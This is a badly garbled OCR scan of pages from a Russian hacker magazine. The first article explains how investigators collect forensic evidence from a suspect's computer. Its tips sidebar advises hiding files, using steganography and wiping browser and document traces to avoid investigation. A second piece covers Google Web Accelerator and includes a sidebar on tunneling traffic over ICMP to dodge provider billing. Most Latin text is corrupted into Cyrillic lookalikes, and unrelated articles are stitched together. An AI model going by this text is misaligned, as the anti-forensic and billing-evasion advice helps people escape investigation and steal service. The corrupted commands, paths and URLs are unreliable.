заверить: если они захотят кого-то найти, то 
обязательно найдут. Даю тебе все 200%! А 
потом еще и засудят, используя в качестве до- 
казательств найденные во время обыска ули- 
ки, пускай даже косвенные. Сгодится все что 
угодно, начиная тем, какое оборудование было 
обнаружено у тебя дома («Подозреваемый, а 
зачем Вам нужен аппарат для изготовления 
пластиковых карт?»), и заканчивая списком 
сайтов, которыйты посещал, конечноже забыв 
удалить историю. 

□ Что, как и зачем 

Обычно задержание и арест проходят по 
вполне стандартной схеме. Начинается все 
стого, что компетентные органы посещают 
место жительства подозреваемого (какуже 
было сказано, имея в руках некоторые доказа- 
тельства, например логи провайдера). После 



риторического вопроса: «Пользуетесь ли Вы 
компьютерами?» — следственный эксперт 
фотографируеттвою машину, уделяя особое 
внимание задней панели. Почему? Да потому, 
что задокументированные снимки могут 
подтвердить факт использования задер- 
жаннымтого или иного оборудования, втом 
числе сетевых устройств (с помощью которых 
совершался выход в сеть и, соответственно, 
взлом). Данные с компьютера хакера особым 
образом копируются, и копии используются в 
ходе расследования, а оригинал помещается 
в надежное место для хранения веществен- 
ных доказательств. Какудостовериться, что 
тебе не записали ничего лишнего уже после 
изъятия компьютера? Для этого эксперты вы- 
числяют хэш-коды МБ5 или 5НА, которые при 
необходимости могут подтвердить истинность 
данных. Дальше — дел о техники. 

□ Начинаем операцию 

Странные ребята эти хакеры, ненасытные. 
Малотого, что взломали интернет-магазин и 
увели всю базу с конфиденциальной инфор- 
мацией о пользователях, так еще прописали 
на странице загрузчикстрояном (который 
впаривался каждому посетителю), а потом еще 
и во внутреннюю сеть полезли. В общем, сде- 
лали все что только возможно, чтобы привлечь 
внимание, и, как это обычно бывает, в одном 
месте, и все-таки засветились. Пускай это 
будет случайный запрос браузера с настоя- 
щего ІР в момент, когда упало маскирующее 
ѴРЫ-соединение. Найти злоумышленника по 
сетевому адресу — проще простого, и вот через 
несколько дней к нему нагрянули гости! Цель 
проста — собрать доказательства. Но как? 
Кэтому могут быть привлечены как наши 
органы, так и независимые эксперты. Но и тем, 
и другим требуется некоторый набор инстру- 
ментов, состав которого напрямую зависит 



отисследуемой файловой и операционной 
системы. Практически всегда хоть что-то да 
можно откопать. 

Вот, например, винда. Хакер упорно отри- 
цает свои занятия грязными делишками и 
уверяет, что вообще не знаком со взломом. 

Но уже через пару дней во время допроса ему 
предоставляют толстую папочку, в которой 
отображена вся история сетевой активности 
(Восиплепіз апб БеІНіпдзѴизегМосаІ 5еМпд$\ 
НізІогу\), включающая запись о том самом зло- 
получном интернет-магазине, конфиденци- 
альные данные из кэша браузера (Ооситепіз 
апб 5еиіпд5\и5ег\І_оса15еиіпд5\Теппрогагу 
I піегпеі; РіІез\), которые могли там оказаться 
только в том случае, если хакер имел доступ 
кзащищенной (и взломанной) части сайта, 
и многое другое. А помимо этого, в системе 
«случайно» обнаружатся авторизированные 
55Б-сертификаты для различных аккаунтов в 
платежных системах и, что еще хуже, банках. 
Товарищ, откуда все это? Быстрый анализ 
таких вот предательских местечек можно про- 
вести с помощью специальной утилиты ѴѴеЬ 
Нізіогіап ( ѵѵѵѵѵѵ.тапбіапІ.сот/ѵѵеЬЫзІогіап. 
Мт ), которой хорошо известны все секреты 
современных браузеров. 

Мало того, в ходе экспертизы выяснится, что в 
системе была установлена куча самого что ни 
на есть хакерского софта, который ты пытался 
впопыхахудалить. Только вот незадача. Боль- 
шая часть прикладных программ так гадит в 
систему, что спешутебя заверить: следы за 
собой они оставят обязательно. Нынешние 
деинсталляторы ни на что не годятся, и дове- 
рять можно только самому себе. А для этого 
уже во время установки и дальше, во время 
эксплуатации, нужно четко следить и запоми- 
нать, где программа оставляет следы своей 
деятельности. В этом тебе, кстати, помогут 
утилиты от Бузіпіегпаіз ( ммѵѵ.тісгозоМсот/ 
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> Некоторые из 
описанных продук- 
тов не подлежат 
распространению, 
однако мы все же 
постарались сделать 
подборку полезных 
утилит. Беты, как 
обычно, найдешь на 
□ѴБ-диске. 




> Одна из самых дорогостоящих и авторитетных про- 
грамм для анализа компьютеров пойманных хакеров. > Надежно удалить данные можно, но делать это нужно 

Цена корпоративной версии превышает$2000 сумом и правильными инструментами 




Технологии слежки 
за пользователями 
с каждым днем 
становятся все со- 
вершеннее. В первую 
очередь это вызва н о 
ростом террорис- 
тического влия- 
ния. Рекомендую 
тебе почитать 
\л/ѵ\/ѵ\/.еГ.огд — та м час- 
тенько выкладывают 
интересные данные о 
вторжении в личную 
жизнь со стороны 
всевозможных 
ведомств, о которых 
пользователь даже 
не догадывается. 




>3нал литы отом, 
что почти на каждой 
бумажке, распеча- 
танной на принтере, 
содержится уникаль- 
ный невидимый код, 
с помощью которого 
можноустановить, 
с какого конкретно 
оборудования была 
произведена печать. 
Детективы исполь- 
зуют та кую тему в 
целях обнаружения 
«письменных» шан- 
тажистов и прочих 
негодяев. 

/040 



іесИпеі/БѴБІпіегпаІз І: ВІБктоп, Рііетоп, Редтоп, РгосеББ 
Мопііог. Несколько других советов ты найдешь во врезке. 

□ Поближе к файлам: 
программные методы 

Одним исследованием твоих сетевых пристрастий не обой- 
тись, поэтому следа ки обязательно изучат все содержимое 
твоего харда. В этих целях используются специальныеутили- 
ты, которые нетолько проанализируют все файлы на диске, 
но еще и создадут наглядные и удобные отчеты и листинги. 
Прямо по заказу: сначала для устрашения злоумышленника 
(помнишь отой самой толстой папочке?), а потом для эффект- 
ного выступления в суде. 

Серьезно ошибаются те, кто рассматриваетустановленную 
ІІпіх-систему как гарантбезопасности. Слишком сложно 
для экспертизы? Наоборот! Грамотные люди обязательно 
воспользуются специальным набором программ для анализа 
ІІКІІХ-систем — ТЬе ЗІеиіЬ Кіі ( ѵѵѵѵѵѵ.БІеиіЬкіРогд ). Связка Т5К 
хорошатем, что позволяет получить детальный отчето сис- 
теме, выявить любые файлы, скрываемые руткитами, и при 
этом не нарушить целостность системы, что крайне важно 
для сбора доказательств. Комплекс скрупулезно анализирует 
файловые системы РАТ, ЫТР5, Рхі2/3, ІІР5, выводитлистинги 
всех каталогов, восстанавливаетудаленные файлы, строит 
графические диаграммы файловых операций и работаете 
базами хэш-кодов файлов. Словом, утаить что-либо будет 
оченьеложно. 

Кстати, чтобы не дай бог ничего не сбить в системе зло- 
умышленника (чтобы тотне использовал этот факт для своей 
защиты в суде), компетентные ребята обязательно захотят 
снять точную копию физического накопителя. И сделают 



это, например, с помощью знаменитой утилиты 5а!еЬаск 
( ѵѵѵѵѵѵ.огепБІСБ-іпи.сопп/Баі'еЬаск.ЫппІ ). В результате этой 
процедуры будет составлен сжатый файл, в котором и будет 
сохранена вся инфа схарда (втом числе и сБСЗІ-винтов). 
Чтобы заверить подлинность та кого образа, программа 
создаетспециальный лог-файл, в котором документируется 
весь процесс копирования и в который после его заверше- 
ния заносится местоположение исследуемого инцидента и 
оборудования, изготовитель харда и его серийный номер, 
фамилия и имя эксперта. 

Но на стол кэксперту может попасть нетолько обычный 
компьютер или ноутбук. Так, существуют специальные 
приложения, готовые произвести тщательный анализ 
портативныхустройств. Большой популярностью среди 
специалистов по информационной безопасности пользу- 
ется Рпсазе [ ѵѵѵѵѵѵ.дцібапсеБО^ѵѵа ге.сот ). Несмотря на то 
что появиласьутилита достаточно давно, ее по сей день 
используют как небольшие коммерческие предприятия, так 
и крупные правительственные структуры. Причем освоить 
все премудрости работы с этим программным комплек- 
сом предлагается на специализированных курсах. Сам 
продукт распространяется в двух версиях: корпоративной и 
экспертной. Основное их различие втом, что корпоративная 
версия способно анализировать сразу группу компьютеров 
в локальной сети, что иногда очень полезно (скажем, для по- 
иска преступника внутри большой компании). В этом случае 
Епсазе будет обращаться ккаждой машине, распределено 
анализируя файловые системы. Что будет представлять 
собойтакая машина, не имеет никакого значения, так как 
этот серьезный комплекс дружитсразу со всеми известными 
операционными системами и можетбыть использован даже 



«НЕ СТОИТ ОБМАНЫВАТЬ СЕБЯ, ЧТО ЛЮБЫЕ 
ДЕЙСТВИЯ В СЕТИ ОСТАНУТСЯ БЕЗНАКА- 
ЗАННЫМИ. Т0 Р ЧТО СЕГОДНЯ ТЕБЯ НИКТО НЕ 
БЕСПОКОИТ, ЕЩЕ НЕ ЗНАЧИТ, ЧТО ЗА ТОБОЙ 
НЕ ВЕДЕТСЯ НАБЛЮДЕНИЕ И ПРОТИВ ТЕБЯ 
НЕ СОБИРАЮТСЯ ДОКАЗАТЕЛЬСТВА» 
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> От пристального внимания со стороны драгі никуда не деться. 
Программа обнаружила все дисковые разделы, включая те, кото- 
рыеты удалил, когда реально подсел на измену 




>Такпросто можно посчитать контрольные суммы для нескольких 
файлов под виндой. Надежная гарантия целостности данныхза 
считанные секунды 



при анализе портативных карманных компью- 
теров и носителей. 

Мы рассмотрели довольно сложные варианты, 
хотя, как правило, идти на подобныеухищрения 
необязательно. Что можетбыть проще, чем 
до боли знакомая ѴѴІпсІоѵѵз-система? Рогепсіз 
Тооікіі ( ѵѵѵѵѵѵ.ассеззсіаіа.сопп ) — это чисто вин- 
довый пакете богатыми функциями для снятия 
данных сжестких дисков, анализа отдельных 
разделов и их файловых особенностей. Основ- 
ная фишка РТК — это максимально быстрая 
работа с прикладным уровнем системы. Он 
гораздо проще Епсазе и предусматриваетсразу 
несколько вариантов просмотра образа диска. 
Кпримеру, можно выбрать в меню программы 
пункт«Электронныетаблицы», и РТКтутже 
выведетсписок всех найденныххіз-файлов с 
описанием и указанием месторасположения. 
Аналогичным образом легко отыскиваются базы 
данных, графика и сообщения электронной поч- 
ты. Достаточно кликнуть на Р5Т-файл Оиііоок 
— и РТК раскодирует все его содержимое, в том 
числе посланную почту, журнальные записи, 
задачи, календарь и удаленные документы. На 
борту программы присутствует база ключевых 
слов, по которым осуществляется поиск компро- 
метирующей информации, включающая в себя 
такие слова, какое, іап, разе. 



□ Аппаратная часть 

Протоколированию подлежит не только 
информация с жестких дисков и сменных 
носителей, но и сама начинка компьютера. 
Если там окажется что-то украденное или 
скарженное, беды не миновать. Как про- 
изводится анализ железа? Раньше органы 
действовали следующим образом: система 
изымалась, ее везли на экспертизу в специ- 
альную лабораторию и там уже проводили с 
ней все необходимые манипуляции. Сейчас 
же в 80% случаев используется портативное 
переносное оборудование, с помощью ко- 
торого легко и быстро дублируются данные, 
настройки, серийные номера девайсов и т.д. 
Причем все это применяется в совокупности 
с блокираторами записи. Такой подход по- 
могает избежать сразу целого ряда потен- 
циальных ошибок, таких как случайное изме- 
нение дат и контрольных сумм, уничтожение 
каких-либо процессов, перезапись данных 
и пр. Ведь при исследовании копии машины 
оригинальный «экспонат» остается в полной 
сохранности. 

В ряде случаев органы обходятся лишь 
конфискацией харда, который в дальнейшем 
просто присоединяется к целевой системе. 
Стандартная конфигурация подобной маши- 



ны: современный процессор, не менее 256 
ОЗУ, большие жесткие диски ЮЕ/5С5І, карта и 
контроллер 5С5І, привод для чтения компакт- 
дисков, ленточные накопители (типа ЕхаЬуіе), 
дополнительный источник питания, адаптер 
преобразования параллельного интерфейса 
в 5С5І. Существуют специальные считываю- 
щие устройства, позволяющие решать вопрос 
копирования информации на компьютер 
эксперта за считанные минуты. Например, 
ЕазіВІос ( епсазе.со.га/зоіиііопз/ассеззогіез/ 
іпсІех.зЬіпп І. который одновременно является 
и блокиратором записи, страхующим от 
случайных записей на оригинальный жес- 
ткий диск во время дублирования данных. 
Аппаратный блокиратор записи, например 
N оѴѴгіІе [ ѵѵѵѵѵѵ.зіегга-саЫез.сопп/Еогепзіс/ 
поѵѵгіІеІРЕ.Ьіт ). обеспечивает неприкосно- 
венность данных (то есть гарантию отсутствия 
изменений) во время копирования информа- 
ции. Правда, при использовании подобного 
рода устройств транспортировка данных 
значительно замедляется. 

Программный блокиратор записи делаетанало- 
гичную работу путем изменения таблицы преры- 
ваний, в которой содержатся сервисные записи 
ВІ05. Прерывание — это метод, с помощью 
которого программы разговариваютствоей 



«РАЗГОВАРИВАЮТ СЛЕДОВАТЕЛЬ И СВИДЕТЕЛЬ: 

- ВЫ ДОГАДЫВАЕТЕСЬ, ПОЧЕМУ ВАС ВЫЗВАЛИ? 

- ДА, НО ЛУЧШЕ БУДЕТ, ЕСЛИ ВЫ СКАЖЕТЕ. 

- ПОЧЕМУ ЛУЧШЕ? 

- В ПРОТИВНОМ СЛУЧАЕ ПОЛУЧИТСЯ, ЧТО ВАМ 
СТЫДНО СКАЗАТЬ» 
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системой, сообщая ей, что необходимо 
сделать. Самую важную роль в них игра- 
ет прерывание іпіі 3 И , указывающее на 
кодзаписи и чтения с диска. Блокира- 
тор за меняет запись прерывания своей 
собственной, перехватывая все обра- 
щения кдиску. Схема дублирования 
такова: данные по блокам копируются 
на приемное устройство с исходного 
носителя. Размер передаваемого 
блока, как правило, кратен 512 байтам, 
являющимся размером тривиального 
сектора любого диска. После копиро- 
вания для каждого файла выполняется 
расчет контрольной суммы, необхо- 
димой для доказательства того, что 
этот файл на компьютере эксперта не 
изменялся. Обычно подсчет осущест- 
вляется на автомате современными 
программами, но в принципе то же 
самое можно сделать и вручную. 

ДЛЯ СИСТЕМ ІІІЧІХ: 

[ зкѵ 2 @ 1 оса 1 Ъ.озД / гооС]# 
тсІБзит /изг/Ьіп 
13тЬ07ак23 8аоЬтЗ 01оа58ап23 б 
Іад /изг/Ьіп 

П0Д0СѴѴШ00ѴѴ5: 

тЬБзит -Ь СіІе.Ьос (флаг -Ь 
обязателен для подсчета в 
тЬБ ) 

□ Шаловливые ручонки 

Очень часто злоумышленники стара- 
ются помешать экспертизе, удалив все 
свои данные. Некомпетентные лица 
просто заново разбивают жесткий 
диск на разделы или просто формати- 
руют все диски. Нозадача экспертов в 
этом случае особенно не усложняется. 
Путем форматирования полностью 
удалить информацию невозможно. Для 
восстановления информации после 
форматирования существует много 
софтин, которые зачастую используются 
самими пользователями, по случайности 
удалившими что-то важное. Принцип их 
работы прост. Любые средства восста- 
новления ищут примерные сигнатуры 
бывших файловых систем, размещенных 
в каждом разделе. По каким парамет- 
рам? К примеру, РАТ содержит значения 
0x55 и ОхАА в 51 0 и 51 1 байтах началь- 
ного сектора, ІЧТР5 — по смещению 3 от 
начала, а в конце обязательно следует 
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сигнатура 55 Ь ААЬ и т.д. После обна- 
ружения раздела и определения типа 
файловой системы начинается процесс 
поиска файлов путем сравнения извест- 
ных сигнатур файлов (включенных в базу 
данных программы для восстановления 
информации) с имеющимися на диске. 
Например, большинство фотографий 
содержит сигнатуру БРІР и ЕХІР. 

В Ыпих очень актуальна утилита драіі, 
которая, используя описанные выше 
приемы, восстанавливает исходные 
файловые системы на жестком диске. Это 
делается примернотак: 



#драгС -ѵ образ_диска . сИ 
Шгбпіпд: збгапде рагРібіоп 
СаЫе тадіс 0x0000 



Ведіп зсап. . . 

РоззіЫе РагСібіоп (Біпих 
ехС2), з і 2 е (бООтЬ) 
РоззіЫе РагЫЫоп (№ГР8) , 
зіге (1.7 дЬ) 



пвг,ь 

п.іёеа Ѵуи’ѵеЪ 
мппа С е ^ е{иіѵе Ье; 

І прг»т 
І г а^і(і*паІ І;і 
еіі кт 
{Ьие'с 

. , . * г кі|| 

Іаг М 

■ е Сиі 

■5 Са?е 

. __ I Ьг а, 




НЕСКОЛЬКО ПОЛЕЗНЫХ СОВЕТОВ 



1. Любые конфиденциальные файлы держи только 
на сменных носителях. Размещать подобные данные 
на своем обычном жестком диске — идея не очень 
разумная. В последнем случае секретную инфу 
можно зашифровать, но надежно спрятать ее вряд ли 
удастся. Хотя можно попробовать заюзать стеганог- 
рафию (прием, скрывающий сам факт использования 
шифрования), воспользовавшись утилитами ОіЫЫІр 
( ѵѵѵѵѵѵ.іЬеагдоп.сопп/асЫЦез/зІіедаподгарЬѵ/діЫі-ир ). 
МРЗзіедо ( ѵѵѵѵѵѵ.реЛісоІаз.пеіЯаЫеп/зІедаподгарНу/ 
трЗзіедо ). ЭіедаподгарИу Тооіз ( ѵѵѵѵѵѵщіс.сот/ 
ЭесигіІѵ/зІедІооІз.Ыт ). 

2. Чтобы не морочить себе голову по поводу времен- 
ных файлов браузера, нужно сразу отключить любое 
кэширование в его настройках. В случае Іпіегпеі 
Ехріогег’а кэширование отключается в ветке реестра 
[НКЕУ_Е0САЕ_МАСНІМЕ\50ЕТѴѴАРЕ\Місго5оЛ\ѴѴІпбоѵѵ5\ 
СиггепіѴегзіопЧпіегпеЛ. 

3. Активированный параметр ЫоРесепШосзНізіогу 
в ветке [НКЕУ_Е0САЕ_МАСНІМЕ\5оЛѵѵаге\Місго5оП\ 

ѴѴі п сі оѵѵз\С и гге п 1; Ѵе гз і о п\ Ро I і с і ез\ Ех р Іо ге г] запрещает 



Из вывода программы ясно, что на 
диске всего два раздела: Ыпих ехі2 и 
ЫТР5. Аналогичным образом работают 
тулзы ТезЮізк ( ѵѵѵѵѵѵ.сдзесигіІу.огдА/ѵікі/ 
ТезіРізк ). Восстановив файловую систему, 
следователи займутся поиском мета- 
данных или, иначе говоря, специальных 
конструкций, с помощью которых можно 
просмотреть содержимое файла и даже 
осуществлять поиск. Кстати, сняв слепок 
системы и отдав тебе компьютер под рас- 
писку, они легко смогут выяснить, чтоты 
там потом натворил: какие файлы удалил 
и что в системе изменил. 

Для вывода структур метаданных можно 
воспользоваться утилитой из пакета Т5К 
— ізіаі, которая будет выводить информа- 
цию по блокам. 

Порой в своей практике эксперты сталки- 
ваются стем, что хитроумные злоумыш- 
ленники делают в своем логове тайники, 
где и прячут оборудование. Например, в 
одной фирме с двойной бухгалтерией сер- 
вер размещался над навесным потолком, 
а единственный кабель (витая пара), спус- 
кающийся вниз, был сверху приделан к 
пружинному механизму, который в случае 
необходимости вытягивал кабель к потол- 
ку. В итоге, пришедшие с «долгожданной» 
проверкой даже не смогли найти сервер с 
да н н ы м и . □С 



системе вести статистику о документах, с которыми поль- 
зователь недавно работал. 

4. Помни, что некоторые файлы хранят больше инфор- 
мации, чем это кажется на первый взгляд. К примеру, в 
некоторых форматах документов (в том числе МісгозоИ 
ѴѴогб), крометекста, сохраняются метаданные. Пример 
собранной информации из документа ѴѴогсІ: 

ВиіІС-іп БосшпепС РгорегСіез: 

ВиіІС-іп РгорегСіез СопСаіпіпд 

МеСасіаСа: 3 

ТіВІе: Счета 

АиСіюг : карда 

Сотрапу: Сагсіа-ЬагЬа 

БазС 10 АиДЬюгз : 

Наз Базе 10 БаСа 

МізЬка С: \МІ8Ь.ка\Сагсііпд\Могк\сЬ.еі:а . БОС 
СетадІаЫп Б: МТсіеіепсеХсІіеСа . БОС 
догі Е : ХРашЬаХсЬеСа . БОС 
зСеррег Р : \Хакер\БѴБ\Баі1у ВоіСХскеСа. 

БОС 

Как видишь, следователям под силу изучить всю цепочку, 
по которой путешествовал файл, тем самым выявляя всех 
твоих сподвижников и партнеров по злобным делишкам. 
Чтобы избежать подобных вещей, следует внимательно 
отнестись к рекомендации МісгозоЯ ( зиррогЕтісгозок. 
сот/беі'а и и.азрх?зсісІ=кЬ: ЕМ -115:223396 ). 
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КАК СЭКОНОМИТЬ ДОРОГИЕ МЕГАБАЙТЫ ТРАФИКА 
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Интернет редко бывает хорошим и дешевым одновременно, что толкает многих ха- 
керов на незаконные действия, зачастую заканчивающиеся условной судимостью. 

Но мы пойдем другим путем — загрузим Соо^іе ѴѴеЪ Ассеіегаіюг и путем ковыряния 
в настройках выжмем из него все, на что он только способен (в том числе заставив 
его работать на официально не поддерживаемой Опере), сэкономив как на модемном 
подключении, так и на Б5Ь. А в довесок рассмотрим еще парочку способов посидеть в 
инете на халяву, за которые, правда, можно получить по голове! 



О Презент от боодіе 

Программы, ускоряющие доступ в сеть и 
экономящие трафик (с общим названием 
«акселераторы»), появились не вчера и даже не 
позавчера. Делятся они на две больших группы: 
хорошие (платные) и отстойные (бесплатные), 
боодіе создал свой собственный акселератор, 
занимающий между ними промежуточное 
положение и потому представляющий для люби- 
телей халявы огромный интерес. Настолько 



огромный, что после запуска проекта боодіе был 
вынужден на некоторое время прикрыть к нему 
доступ, поскольку имеющихся вычислительных 
мощностей и пропускной способности сетевых 
каналов для обслуживания всехжелающих 
оказалось недостаточно. 

И вот сейчас доступ открыт вновь 
(правда, неизвестно, надолго л и), так что 
лови свой шанс! боодіе ѴѴеЬ Ассеіегаіог (далее 
по тексту для краткости называемый просто 



6ѴѴА), действительно, реальноувеличивает 
скорость работы сѵѵеЬ'ом или экономиттрафик 
(именно «или» — согласно основному правилу 
оптимизации, за все приходится платить, 
и, улучшая одни показатели, мы неизбежно 
ухудшаем другие). И хотя 6ѴѴА значительно 
отстает от своих коммерческих конкурентов (о 
которых мы поговорим в отдельной врезке), он 
бесплатен, что для многих является решающим 
фактором. 
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□ Установка ѲѴѴА на свой компьютер 

Заходим на ѵѵѵѵѵѵ.доодіе.сот . видим там ссылку 
«тоге», щелкаем по ней, в открывшемся окне 
выбираем «еѵеп тоге» и среди множества 
проектов, в самом низу, находим затерявшийся 
ѴѴеЬ Ассеіегаіог: ЫірУ/ѵѵеЬассеІегаІог.доодІе.сот . 
По завершении самой установки в системном 
трее появляется изображение настольных 



часов а налогового типа, такие же точно часы 
появляются и на панели Рі гебох или ІЕ (замечу, 
что Орега официально, нотолько официально, 
не поддерживается). Сразу же после запуска 
Рі гебох/І Е, персональный брандмауэр (который 
в наше неспокойное время должен быть уста- 
новлен на каждой машине) тутже завопит, что 
приложение ѲоодІеѴѴеЬАссСІіепі.ехе ломится 



в сеть на зЬ.доодІе.сот [66.248.93.93] по 80-му 
порту. Вот это тот самый акселератор и есть! 
Попытка блокировки доступа делает работу 
Рі гебох/І Е невозможной вообще, поскольку 
отныне и вовеки веков они входят в сеть не 
напрямую, а через ѲоодІеѴѴеЬАссСІіепі.ехе, так 
что нажимаем «Уез». 

Следом за 6ѴѴА в сеть ломится сам браузер, 



Модемное соединение 



РЗЬсоединение 



Первым делом переводим радиокнопку «Бресту уоигіуре оі Іпіегпеі: соппесііоп» в поло- 
жение«ОіаІир», активируем предвыборку страниц («ЕпаЫе РгеіеісЬіпд») и подсвечива- 
ние уже предвыбранных страниц двойным подчеркиванием, как это показано в ехатріе 
Ііпк, приведенном в качестве образца. Это поможет нам просматривать страницы втом 
порядке, в котором их загружает СѴѴАи который далеко не всегда совпадаете порядком 
их следования на текущей странице (напоминаем, что предвыборка осуществляется на 
основе рейтинга популярности). Для достижения максимальной скорости переводим 
радиокнопку «Беіесі Ьоѵѵігедиепиу боодіе ѴѴеЬ АссеІегаіогсЬескз іог пеѵѵегѵегзіопз оі 
сасЬесІ радез» в положение «СЬеск іог пеѵѵегѵегзіопз іііЬе сопіепі із Іікеіу іо сЬапде», 
чтобы 6ѴѴА передавал только реально измененные страницы. Однако следует помнить, 
что этот механизм не застрахован отошибоки в некоторых случаях ѲѴѴА не замечает, 
что страница была изменена, показывая нам старую версию. Поэтому для надежности 
лучше все-таки оставить эту радиокнопку в положении «Аіѵѵауз сЬеск іог пеѵѵегѵегзіопз 
(РесоттепсІесІ)», в котором она и находилась поумолчанию. 

Сохраняем параметры кнопкой «5аѵе Ргеіегепсез» и начинаем блуждать по Сети. Часы 
на панели инструментов вращают стрелкой, отображая текущую скорость скачки и по- 
казывая сэкономленное время, рассчитываемое по недокументированному алгоритму, 
поэтому этим цифрам нельзя доверять. Но все же это не мешает получать удовольствие 
от наблюдения за ними. Для просмотра более детальной статистики выбери в контекстом 
меню 6ѴѴА пункт«Регіогтапсе Оаіа» (или набери «Ыір://1 27.0.0.1 :91 00/гасез» в Горящем 
Лисе или ІЕ), после чего откроется специальное окно, в котором можноузнать, сколько 
времени удалось сэкономить 6ѴѴА. Правда, как обстоят дела с экономией трафика, оста- 
ется только гадать. 



Радиокнопку «Бресііууоигіуре о[ I піегпеі; 
соппесііоп» оставляем в положении поумол- 
чанию — «ОБЕ». Вырубаем предвыборку, сни- 
мая галочку с «ЕпаЫе РгеіеісЬіпд», чтобы не 
попасть натрафик, но оставляем взведенной 
галку «НідЫідЫ Ыпкзіо РгеіеісЬесІ Радез», 
чтобы популярные ссылки сразуже броса- 
лись в глаза (это работает не на всех сайтах). 
Положение «Беіесі Ьоѵѵігедиепііу Ѳоодіе 
ѴѴеЬ Ассеіегаіог сЬескзіог пеѵѵегѵегзіопз оі 
сасЬесІ радез» определяется в соответствии с 
личными предпочтениями. Позиция «Аіѵѵауз 
сбеск іог пеѵѵегѵегзіопз» дает стопроцент- 
ную гарантию, что мы увидим страницу «как 
она есть», а «СЬеск іог пеѵѵегѵегзіопз іі іЬе 
сопіепі із Іікеіу іо сЬапде» нехило экономит 
трафике некоторым риском пропуска послед- 
них изменений. 

Нажимаем на «Баѵе Ргеіегепсез» и... наслаж- 
даемся «спидометром», пока не надоест. А 
когда надоест — тутже возникнет естествен- 
ноедля всех хакеровжелание: распотрошить 
6ѴѴА и посмотреть, что у него внутри. 
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и все потомуже самому адресу и порту 
— зЬ.доод Іе.сопп :80, вынуждая нас давить 
«Уев» еще раз. Фактически 5Ь.доод1е.сот:80 
выступает в роли ргоху-сервера, только очень 
хитрого и... местами даже коварного, но не 
будем забегать вперед. 

О Как это работает 

Алгоритмы, заложенные в 6ѴѴА, никакого секре- 
та не представляют и втех или иных вариациях 
используются практически во всех акселера- 
торах, причем взначительно большем объеме, 
чем в 6ѴѴА, который реализует следующий 
перечень возможностей: 

1. 6ѴѴА выступает в роли быстрого ргоху-сер- 
вера: как известно, пропускная способность 
сетевых каналов (как на сііаі-ир, так и на 05І_) 
практически никогда не достигает 100% 
загрузки, поскольку большинство ѵѵеЬ-серве- 
ров сильно перегружено и они обслуживают 
пользователей не одновременно, а по оче- 
реди. Передав «квант» информации, сервер 
ставит пользователя в очередь и принимается 
за следующего, причем величина «кванта» оп- 
ределяется нетолько (и не столько] размером 
блока данных, ной временем, требующимся 
на его пересылку. Следовательно, чем ширеу 
нас канал, тем больше информации мы может 
выкачать за один «квант» и тем выше эффек- 
тивная скорость скачки. ѲѴѴА, располагающий 
распределенной сетью серверов столстыми 
каналами, довольно резво стягивает информа- 
цию даже с перегруженных серверов, отдавая 
ее нам без задержек, в результате чего КПД 
нашего канала приближается к 90%, что очень 
хорошо. 

2 . Распределенная сеть 6ѴѴА автоматичес- 
ки выстраивает наиболее благоприятный 
маршрут передачи пакетов, что также 
увеличивает скорость передачи, причем 
весьма значительно (особенно при работе 



с далекими серверами, разделенными 
десятками промежуточных узлов). 

3. 6ѴѴА оптимизирует параметры соединения: 
ТСР/ІР — очень сложный протокол с множес- 
твомтонких настроек, неучитываемых ни 
операционной системой, ни браузером, ни 
чем-либо еще. Правда, существуют специаль- 
ныеутилиты, типа МТІІЗреесІ, позволяющие 
настраивать параметры ТОР вручную, но... 
прежде чем достичь реального ускорения, с 
ними приходится повозиться. А ѲѴѴА настраи- 
ваетоптимальные параметры автоматически, 
уменьшая количество потерянных пакетов 
(которые сервер вынужден передавать повтор- 
но) и обеспечивая так называемый «быстрый 
старт». Без последнего протокол ТОР довольно 
медленно раскачивается, и прежде чем будет 
достигнута номинальная пропускная способность, 



запрошенная ѵѵеЬ-страница уже успеетзагру- 
зиться, в результате чего чем меньше размер 
страницы, тем с меньшей скоростью она кача- 
ется. Правда, на файлах размером в несколько 
десятков мегабайт это практически никак не 
сказывается. 

4 . ѲѴѴА осуществляет предвыборку 
(ргеЫсЫпд): основываясь на данных попу- 
лярности различных ѵѵеЬ-страниц, получен- 
ных не без помощи закладок, изначально 
встроенных в Оперу и Горящего Лиса, он 
выполняетупреждающую загрузку наиболее 
популярных ссылокстекущих страниц. То 
есть пока мы читаем ѵѵеЬ-страницу, вникая 
в материал, ѲѴѴАактивно качает остальные 
страницы по ссылкам, вероятность пере- 
хода на которые максимальна. Если ѲѴѴА 
предугадает маршрут нашего дальнейшего 



Бесплатный С'ЗІ_: ІСМР-инкапсуляция 

Открою тебе небольшой секрет. Некоторые операторы тарифицируюттолько ТСР/ІЮР-тра- 
фик, но не обращают внимания на ІСМР. То естьты можешь сколько угодно пинговать 
ѵѵѵѵѵѵ. хакер .гц . генерируя тем самым кучутрафика, ностебяза это не снимут ни копейки. 
Вообще ІСМР (Іпіегпеі Сопігоі Меззаде Ргоіосоі) предназначен для передачи контрольных 
сообщений. В случае пинга — это сначала эхо-запрос (ствоей стороны), а затем эхо-ответ 
(со сторны сервера). Однако протокол позволяет вставить в сообщение любую информацию 
и передать ее в сеть — и для провайдера это будет все тот же ІСМР! Понимаешь? Мы можем 
поднять ІСМР-тоннель, пустить через него весьтрафик, итогда передача данных будет совер- 
шенно бесплатной. Причем никто не сможет наехать и предъявить искза взлом, поскольку мы 
вправе использовать всеуслуги, которыетолько предоставляет оператор! Другое дело, что за 
это вполне могут отключить, потому лучше неувлекаться и гигабайтами не воровать. 

Все, что нам потребуется, — это специльная программа ріиппеі ( ѵѵѵѵѵѵ.С5.иіГпо/~сІапіе1-5/ 
РіпдТиппеІ ]. которую нужно установить на никсовый шелл. Где его взять? Лучше всего, 
конечно, банально купить. Все удовольствие обойдется в $5-10 в месяц, а это, по-моему, 
вполне достойная цена за халявныйтрафик. Но если с финансами ну совсемтуго, можно 
проштудировать списки бесплатных шелл-хостеров [ ѵѵѵѵѵѵ. ігеезЬеЦ. сот ) и найти там под- 
ходящий вариант. Затем на твоем компе поднимается клиентская часть ріиппеГа, которая 
работает в виде обычной локальной прокси. Тебе останется только прописать ее в настрой- 
ках браузера: адрес 1 27.0.0.1 и порт, на котором она работает. 
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> Персональный брандмауэр 5у0а1е Регзопаі 
Рігеѵѵаіі засекает попытку ѲѴѴА выйти в Сеть 



ѵѵеЬ-путешествия, скорость открытия уже загруженных 
страниц нас просто сразит наповал. Вот это акселера- 
ция! Вот это ускорение! На модемном соединении такой 
подход эко но мит уйму времени (а значит, и денег), правда, 
при условии, что ѵѵеЬ-серфинг не сочетается с фоновой 
